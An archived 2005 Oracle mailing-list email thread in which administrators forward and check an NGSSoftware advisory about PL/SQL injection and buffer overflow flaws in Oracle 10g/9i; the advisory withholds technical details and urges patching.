From oracle-l-bounce@freelists.org Wed Jan 19 10:19:07 2005 Return-Path: Received: from air891.startdedicated.com (root@localhost) by orafaq.com (8.12.10/8.12.10) with ESMTP id j0JGJ7WJ020044 for ; Wed, 19 Jan 2005 10:19:07 -0600 X-ClientAddr: 206.53.239.180 Received: from turing.freelists.org (freelists-180.iquest.net [206.53.239.180]) by air891.startdedicated.com (8.12.10/8.12.10) with ESMTP id j0JGJ7Ql020039 for ; Wed, 19 Jan 2005 10:19:07 -0600 Received: from localhost (localhost [127.0.0.1]) by turing.freelists.org (Avenir Technologies Mail Multiplex) with ESMTP id 64F1572CEF5; Wed, 19 Jan 2005 09:46:50 -0500 (EST) Received: from turing.freelists.org ([127.0.0.1]) by localhost (turing [127.0.0.1]) (amavisd-new, port 10024) with ESMTP id 04897-86; Wed, 19 Jan 2005 09:46:50 -0500 (EST) Received: from turing (localhost [127.0.0.1]) by turing.freelists.org (Avenir Technologies Mail Multiplex) with ESMTP id D151572CF28; Wed, 19 Jan 2005 09:46:44 -0500 (EST) From: "Ruth Gramolini" To: , "oracle-l" Subject: RE: [VulnWatch] Multiple high risk vulnerabilities in Oracle RDBMS 10g/9i Date: Wed, 19 Jan 2005 09:44:58 -0500 Message-ID: <002201c4fe35$7290a3a0$8459000a@vttaxnet.tax.state.vt.us> MIME-Version: 1.0 Content-type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit In-Reply-To: <001c01c4fe3b$ae05fc90$6401a8c0@dilbert> X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1441 X-archive-position: 14937 X-ecartis-version: Ecartis v1.0.0 Sender: oracle-l-bounce@freelists.org Errors-To: oracle-l-bounce@freelists.org X-original-sender: rgramolini@tax.state.vt.us Precedence: normal Reply-To: rgramolini@tax.state.vt.us X-list: oracle-l X-Virus-Scanned: by amavisd-new at freelists.org X-Spam-Status: No, hits=0.0 required=5.0 tests=none autolearn=ham version=2.60 X-Spam-Level: X-Spam-Checker-Version: SpamAssassin 2.60 (1.212-2003-09-23-exp) on air891.startdedicated.com I just got the email from Oracle about this. I guess it's real. Ruth -----Original Message----- From: oracle-l-bounce@freelists.org [mailto:oracle-l-bounce@freelists.org]On Behalf Of Don Granaman Sent: Wednesday, January 19, 2005 10:30 AM To: rgramolini@tax.state.vt.us; oracle-l Subject: Re: [VulnWatch] Multiple high risk vulnerabilities in Oracle RDBMS 10g/9i This same "alert" was forwarded to me yesterday also. I could find no such patch - or any other related information on Metalink or OTN's security alerts. The most recent (unrelated) security alert I could find was from Dec 17, 2004. -Don Granaman ----- Original Message ----- From: "Ruth Gramolini" To: "oracle-l" Sent: Tuesday, January 18, 2005 11:52 AM Subject: FW: [VulnWatch] Multiple high risk vulnerabilities in Oracle RDBMS 10g/9i > I just received this from my SA, Claus. Has anyone applied this patchset? > Does anyone know the details. > > Inquiring minds what to know. > Ruth > > -----Original Message----- > From: Claus Lund [mailto:clund@tax.state.vt.us] > Sent: Tuesday, January 18, 2005 11:30 AM > To: Ruth Gramolini > Subject: FW: [VulnWatch] Multiple high risk vulnerabilities in Oracle > RDBMS 10g/9i > > > I don't know if you heard about this yet... > > -Claus > > -----Original Message----- > From: NGSSoftware Insight Security Research [mailto:nisr@nextgenss.com] > Sent: Tuesday, January 18, 2005 10:33 AM > To: bugtraq@securityfocus.com; ntbugtraq@listserv.ntbugtraq.com; > vulnwatch@vulnwatch.org > Subject: [VulnWatch] Multiple high risk vulnerabilities in Oracle RDBMS > 10g/9i > > > Researchers at NGSSoftware have discovered multiple high risk > vulnerabilities in the Oracle Database Server. Versions affected include > > Oracle Database 10g - All Releases > Oracle9i Database Server - All Releases > > The vulnerabilities include PL/SQL Injection vulnerabilities that allow low > privileged users to gain DBA privileges and a buffer overflow vulnerability. > The former can be exploited via the web through Oracle Application Server. > Oracle has released a patch set (18/01/2005) to address these issues. Oracle > database administrators are urged to download, test and install the patch > set as soon as possible. See http://metalink.oracle.com/ for more details. > > NGSSoftware are going to withhold details about these flaws for three > months. Full details will be published on the 18th of April 2005. This three > month window will allow Oracle database administrators the time needed to > test and apply the patch set before the details are released to the general > public. This reflects NGSSoftware's new approach to responsible disclosure. > > NGSSQuirreL for Oracle, NGSSoftware's advanced vulnerability assessment > scanner and security manager for Oracle, has been updated to check for and > positively identify these flaws in Oracle database servers on the network. > More information about NGSSQuirreL for Oracle can be found at > http://www.ngssoftware.com/squirrelora.htm. > > NGSSoftware Insight Security Research > http://www.ngssoftware.com/ > +44(0)208 401 0070 > > > > -- > http://www.freelists.org/webpage/oracle-l -- http://www.freelists.org/webpage/oracle-l -- http://www.freelists.org/webpage/oracle-l